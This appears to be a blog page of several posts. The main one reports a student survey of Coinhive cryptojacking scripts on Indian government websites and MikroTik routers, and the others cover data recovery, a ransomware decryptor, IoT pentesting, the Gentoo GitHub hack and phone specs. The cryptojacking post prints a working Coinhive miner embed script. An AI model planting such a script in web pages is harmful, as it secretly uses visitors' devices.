Cryptojacking and India - Government Websites and Being Used to Mining Cryptocurrency and Routers are used to spread Cryptojacking malwares



Ever since Coinhive launched their service in September 2017 , cryptojacking is getting very popular ( mostly for bad usages ). Earlier people use to mine cryptocurrencies using their own hardwares but now as its difficulty level increased so its hardware requirements too increased. But services like Coinhive gave people the power to use some one else's system to mine cryptocurrency and make money.

What Is CryptoJacking ?


Cryptojacking is defined as the secret use of user's computing device to mine cryptocurrency. Cryptojacking used to be confined to the victim unknowingly installing a program that secretly mines cryptocurrency. In-browser cryptojacking doesn’t need a program to be installed which makes it more scary.

In the last few months we saw a lot of news regarding cryptojacking . few of them are :

1. Cryptojacking rates increased by 85 times in Q4 2017 as bitcoin prices spiked: report
2. Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

Its a new topic and not much research is done on it and as it helps hackers make money anonymously so a lot of hackers are into it.

As I'm in my final year of Computer science ( Undergraduate ) so I together with two of my friends - Shakil Ahmed and Anisha Sharma decided to do research on the topic Cryptojacking - Its detection and prevention. 

Before moving ahead with our research we wanted to do a small experiment and see if Indian websites ( mainly Government websites ) and systems are infected with cryptominers and its impact.

The Experiment


Our first aim was to make a list of all the government websites of India and see if they are infected by cryptominers. We searched online for list of government websites but did not get any so we headed over to the website goidirectory.nic.in which list all government websites. So from that website we got around 4,000+ Indian government websites.

Now the next step was to see if the websites have any cryptojacking scripts in it. Today there are many services which allows users to create account and start using their cryptomining scripts. The most popular among them is CoinHive.com . So for our experiment we  checked “coinhive.min.js” - which is  the original Coinhive JavaScript library used in cryptojacking.

It was not a deep analysis, in our experiment we only checked the html of the hompage of each websites so if the script is not present in the homepage we moved on to the next step. We skipped sub-domains too.

We got the following two websites infected by cryptojacker :

1. http://cdma.ap.gov.in 

It is a subdomain of ap.gov.in which have a global ranking of 2495 (Alexa ) . According to Similar Web, cdma.ap.gov.in gets more than 160k+ visits per month. ( Source ) . Since a lot of people visits the website its a perfect target for hacker as more number of views means more money.

cdma.ap.gov.in affected by cryptojacking


We did a reverse IP Lookup on the website and found two more websites :

            a. tirupati.cdma.ap.gov.in
            b. http://macherla.cdma.ap.gov.in/

Both of them were infected by cryptojacking scripts.

2. http://www.ngcnalgonda.org

It is the website of Nagarrjuna Government College, Nalgonda.


Here is how a coinhive script looks like :

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('USER ID', {throttle: 0.3});
 // Only start on non-mobile devices and if not opted-out
 // in the last 14400 seconds (4 hours):
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
  miner.start();
 }
</script>


In Coinhive each user have their own unique USER ID so we decided to dig further and see how many other websites were infected by the same person who infected the above mentioned websites.

Here are the coinhive USER ID of above websites :

1. http://cdma.ap.gov.in -- T9UtNcvcu9o197o4xvHWm49rC3Ba81QR
2. http://www.ngcnalgonda.org -- FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde

We used PublicWWW to see how many other websites were infected by these two users.

1. T9UtNcvcu9o197o4xvHWm49rC3Ba81QR  -- 36 Websites 
2. FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde -- 49 Websites

From this experiment it is clear that hackers are now targeting government websites for mining cryptocurrency as those websites get high traffic and mostly people trust them. Earlier we saw a lot of government websites getting defaced but now injecting cryptojackers are trending as it makes money for the hacker.

After this experiment in Government based websites we tried to see if any Indian system is affected by cryptojackers. Few days back we read the following news : Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware .

We used shodan.io to see how many routers are currently infected any where they are located. we used the following command " http.component:"coinhive" product:"MikroTik http proxy".



To our surprise India ranked second with more than 13,500 routers affected by Cryptojackers which are spreading it further more among users. Top cities include :

1. Raipur
2. Pune
3. Udaipur
4. Mumbai

Conclusion


Through our experiment we got to know that Cryptojacking is spreading fast as it is profitable and majority of people are unaware of it and don't know how to prevent from it. There was a time when hackers use to deface websites and it was easy to detect . But now they simply add cryptojacking scripts in compromised websites making it difficult for users and website owners to detect.

Support our research by donating ETH :

ETH Address : 0xDB6ec3eFD47EC5971FA05b13C8c159Eb2E2547BF

How to recover permanently deleted files in Windows [ Full Guide ]



Our files are very important for us. These days we store a lot o information in our PC, be it our favorite photos, our tax details, academic records etc. But often due to some reason it gets deleted. I'm sure you must have faced a situation where you deleted a file to free up some space only to later realize that you actually needed that file. I guess i'm not the only one who does this often. And due to this reason windows came up with the Recycle Bin feature so that atleast you can restore files.

But But But , * I know you have guessed it already * what if we did a permanent delete of files or what if our Hard disk crashed and all our data is gone. In such cases we often feel lost as our data is gone and there is no way to recover it. Well its not the end of the world. We have something called as data recovery software which helps users recover permanently deleted files. Don't expect it to recover all of your files but hey something is better than nothing. Right ?




If your hard disk keeps on crashing you should definetly check this article : 5 Best External Hard Drives To Buy In 2018


I this article I'll be showing you a software called EaseUS Data Recovery Wizard which can help you recover permanently deleted files. EaseUs Data Recovery Wizard Free makes the task of recovering deleted data, a breeze. The interface of the program is quite user-friendly, and the recovered files are displayed in a typical Explorer format. EaseUS Data Recovery Wizard can typically recover files from:

  • An existing partition
  • Deleted data from a deleted partition
  • Deleted data from a corrupted partition
  • Deleted data from a partition that had been deleted, then overwritten with another.

Here is a step by step guide on how you can use it :


Step 1 : Download the software and install it and this is how the first screen will look like.

 
Here you need to select on which folder you had your deleted files.

Step 2 : Now it will start scanning , you can see the progress bar in top


Step 3 : After the quick scan is done the software will show you few files which were deleted. If you have not yet found the file you can go for deep scan.


Step 4 : Now you can see the preview of the deleted files. You can recover it by clicking the recover button


Step 5 : Once the operation of preview or search is completed, you can select the targeted files and press Recover button to recover and save them on your computer or storage device. At this point, make sure you save all the recovered files on another disk to avoid data overwriting.


Decryption Tool for LockCrypt Ransomware released



Popular antivirus company Bitdefender release a decryption tool which can recover files encrypted by LockCrypt ransomware . But the catch is that it can only decrypt files encrypted by an older version of LockCrypt ransomware that locks the files with .1btc extension

The Bitdefender decryption tool may not be useful for current victims of the LockCrypt ransomware, but users who still have copies of their (.1btc) encrypted files can use it to recover files. Using the tool is pretty simple, as the interface is self-explanatory.

The LockCrypt ransomware is a ransomware strain that infects victims after hackers use brute-force attacks to break into companies' networks via RDP connections, and then manually run the ransomware's binary.


LockCrypt version Status
.BI_D Not decryptable
.1btc Decryptable using Bitdefender tool
.lock Decryptable (contact Michael Gillespie)
.2018 Decryptable (contact Michael Gillespie)
.mich Decryptable (contact Michael Gillespie)

The ransomware was first spotted in June 2017, and security researchers tracked its authors to a group who was previously active on the Satan Ransomware-as-a-Service portal.

IoT Penetration Testing Full Guide



IoT pentesting is a new domain that have entered in penetration testing. With the growing risk of IoT security, attack on various IoT devices, often pentesters are asked by various companies to check their systems. But the problem is that most security service providers don't yet have IoT specialist for testing, it is usually done by regular security team. In this article we will try to see what exactly is IoT penetration testing.

The difficulty level and the steps to perform the testing is almost similar to that of regular testing but if you are discovering flaws via analyzing firmware or via analyzing wireless communications then its going to be difficult.

The benefits to pen testing Iot include strengthening device security, protecting against unauthorized usage, avoiding Elevation of Privileges, Lower reducing the risk of compromise, better user and data privacy, and setting strong Encryption to avoid man-in-the-middle (MTM) attacks.


Most of the currenct research focus on vulnerabilities on the device but it is important to have a look at other areas too. Areas pentesters needs to focus


  • The devices themselves
  • The operating system that runs on the devices
  • The software on the devices
  • The mobile application
  • The servers themselves
  • The build on the servers

Basic IoT Architecture


An attacker gets many ways to breach an IOT system as its architecture compromises a number of elemets that becomes potential hacker's target

IoT architecture consists of the following components :


Things: Smart devices equipped with sensors and actuators.

IoT field Gateways: Border elements that provide connectivity between things and the cloud part of an IoT solution.

Cloud gateways: Components facilitating data compression and transmission between the gateways and cloud servers.

Streaming data processor: An element ensuring a smooth transition of input data to a big data warehouse and control applications.

Data storage: Consists of a data lake (stores unprocessed data in the form of “streams”) and a big data warehouse (stores filtered and structured data, as well as context information about smart devices, sensors, commands from control applications).

Data analytics: A unit that uses information from the big data warehouse to establish data patterns and gain meaningful insights.

Machine learning: Generates and regularly updates models based on the historical data accumulated in a big data warehouse which is used by control applications.

Control applications: Components that send automatic commands and alerts to actuators.

Client-server system: Consists of a user business logic component (the server side), a mobile application and a web application (the client side).





Penetration testing is executed on the following elements of things:

  • UART, JTAG, SWD ports. Exposed ports allow a pentester to get root access, view and modify sensitive data.
  • Flash memory chips to detect a possibility to dump firmware.
  • Bus sniffing. Hackers may sniff clear text data between components and get access to sensitive information.



Book to follow


IoT is interesting and yet a hard topic to follow. Here is a book which i recommend which you can use to learn more about IoT . here is a book by popular security researcher Aditya Gupta who is an expert in Iot Pentesting














Here is how Gentoo Linux Github Account was hacked



If you are someone who are read lot of infosec news then i'm sure you must have heard of how Popular linux distribution Gentoo Linux official github account was hacked last week . After the account was hacked, hacker changed some codes and added some malicious scripts in it that delete’s all the user files.

Gentoo is a free operating system with Pre compiled binaries and it is an ideal secure server for development workstation, professional desktop, gaming system, embedded solution.

The incident took place on 28 June at approximately 20:20 UTC and Gentoo regained control by 2018-06-28 23:10 UTC.

According to gentoo, the hack has not affected the code hosted on the the gentoo infrastructure and the code hosted in github is just a mirror . Gentoo.org was not compromised.

How they got hacked ?


Gentoo developers have revealed that the attackers were able to gain administrative privileges for its github account after guessing the account password. Its 2018 and i don't know why organisations like Gentoo does not use 2 factor authentication.

The organisation could have been saved if it was using a two-factor authentication, which requires an additional passcode besides the password in order to gain access to the account.

Steps taken to improve future attacks


After this incident, gentoo took the following steps to protect themselves from future attacks :


  • Making frequent backups of its GitHub Organization.
  • Enabling two-factor authentication by default in Gentoo's GitHub Organization, which will eventually come to all users the project's repositories.
  • Working on an incident response plan, particularly for sharing information about a security incident with users.
  • Tightening up procedures around credential revocation.
  • Reducing the number of users with elevated privileges, auditing logins, and publishing password policies that mandate password managers.
  • Introducing support for hardware-based 2FA for Gentoo developers




Xiaomi's Mi 8 flagship sells out in 1 minute and 37 seconds



Currently in china Huawei is the biggest smartphone brand but Xiaomi's new flagship Mi8 has created a storm in China. Mi 8 went on sale on 5th june and according to Xiaomi, the phone sold out in just 1 minute and 37 seconds. A lot of people are interested in this device because it is providing a lot of high-end specs in a minimal price. As a matter of fact, the Mi 8 starts off at just CNY 2,699  (approx Rs 28,000) which makes it the cheapest smartphone to come with a Snapdragon 845 SoC. This phone can really bring the competition to the OnePlus 6.

Here are the specs of MI 8



Xiaomi Mi 8 Specifications
Dimensions and weight 154.9 x 74.8 x 7.6 mm, 175g
Software MIUI 10 on top of Android 8.1 Oreo
CPU Octa-core Qualcomm Snapdragon 845 (4x 2.8GHz Kryo 385 Gold + 4x 1.8GHz Kryo 385 Silver cores)
GPU Adreno 630
RAM and storage 6GB of RAM with 64GB/128GB/256GB of storage; Mi 8 Explorer Edition: 8GB of RAM with 128GB of storage
Battery 3400mAh, Quick Charge 4.0+ (Quick Charge 3 adapter bundled in the box)
Display 6.21-inch Full HD+ (2248×1080) AMOLED, 600 nits brightness, supports HDR10, DCI-P3 gamut
Wi-Fi 802.11ac
Bluetooth Bluetooth 5.0
Ports USB Type-C port, dual nano SIM slots
Bands GSM: 850/900/1800/1900MHz
WCDMA: 850/900/1700/1900/2100MHz
FDD-LTE: Bands 1/2/3/4/5/7/8/12/17/20
TDD-LTE: Bands 34/38/39/40/41
Rear camera 12MP camera with 1.4μm pixels, f/1.8 aperture, Dual Pixel autofocus, 4-axis OIS
12MP telephoto camera with f/2.4 aperture, 2x optical zoom
Video recording up to 4K at 60FPS, Slow motion at 1080p240
Front-facing camera 20MP front-facing camera, uses pixel binning to simulate 1.8μm pixels, f/1.8 aperture


Xiaomi states that the Mi 8 is the world’s first smartphone to support dual-frequency GPS. It uses the newer, more powerful L5 band on top of the common L1 band to increase navigation accuracy by three to five times.




The Xiaomi Mi 8 will be available in three variants: 6GB of RAM with 64GB/128GB/256GB of storage. The 64GB storage variant costs CNY 2699 ($420), while the 128GB storage and 256GB storage variants will be available for CNY 2999 ($468) and CNY 3299 ($515) respectively.